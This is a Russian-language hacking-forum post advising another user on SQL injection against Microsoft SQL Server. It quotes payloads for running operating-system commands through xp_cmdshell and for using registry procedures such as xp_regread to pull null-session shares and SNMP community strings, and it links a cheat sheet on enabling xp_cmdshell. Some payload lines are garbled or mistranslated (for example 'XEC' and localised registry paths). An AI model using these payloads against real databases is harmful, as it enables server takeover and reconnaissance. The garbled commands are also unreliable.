07.08.2015, 12:40
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
т. е. нужно было просто с самого начала сказать, что у вас mssql.
Сообщение от BabaDook
↑
Вот, это я имел в виду.
http://www.sqlinjectionwiki.com/Cat...eat-sheet/#Enablingxp_cmdshellinSQLServer2005
Код:
XEC master.dbo.xp_cmdshell "cmd.exe реж C: '
а про вот это я забыл, что такое тоже можно
Код:
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
Exec xp_regread HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Параметры", "nullsessionshares"
Exec xp_regenumvalues HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ SNMP \ Параметры \ validcommunitie
читать абзац "выполнение команд" |
|
|